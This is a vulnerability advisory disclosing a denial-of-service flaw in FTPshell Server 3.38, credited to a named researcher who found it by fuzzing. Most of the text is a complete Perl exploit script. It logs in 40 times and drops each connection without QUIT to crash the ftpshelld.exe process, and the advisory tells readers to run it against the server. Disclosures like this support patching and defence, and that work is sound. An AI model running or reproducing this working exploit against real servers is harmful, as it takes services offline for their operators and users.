Summary: Denial of service vulnerability in FTPshell Server Version 3.38 (http://www.ftpshell.com/) Details: Logging into the FTP server successfully and then closing the connection (without using the QUIT command) 39 times will cause the ftpshelld.exe process will die. Vulnerable Versions: FTPshell Server Version 3.38 Patches/Workarounds: The vendor was notified of the issue. A patch will be release shorly. The patch will be made available via the vendor's web site (http://www.ftpshell.com/). Exploits: Run the following PERL script against the server. The corresponding process will die. #===== Start FTPShell_FTPDOS.pl ===== # # Usage: FTPShell_FTPDOS.pl # FTPShell_FTPDOS.pl 127.0.0.1 hello moto # # FTPshell Server Version 3.38 # # Download: # http://www.ftpshell.com/ # ################################################ use IO::Socket; use Win32; use strict; my($i) = ""; my($socket) = ""; for ($i = 1; $i <= 40; $i++) { if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Login \#$i\n"; Win32::Sleep(300); print $socket "USER $ARGV[1]\r\n"; Win32::Sleep(100); print $socket "PASS $ARGV[2]\r\n"; Win32::Sleep(100); print $socket "PORT 127,0,0,1,18,12\r\n"; Win32::Sleep(100); close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } } #===== Start FTPShell_FTPDOS.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com/tools.html)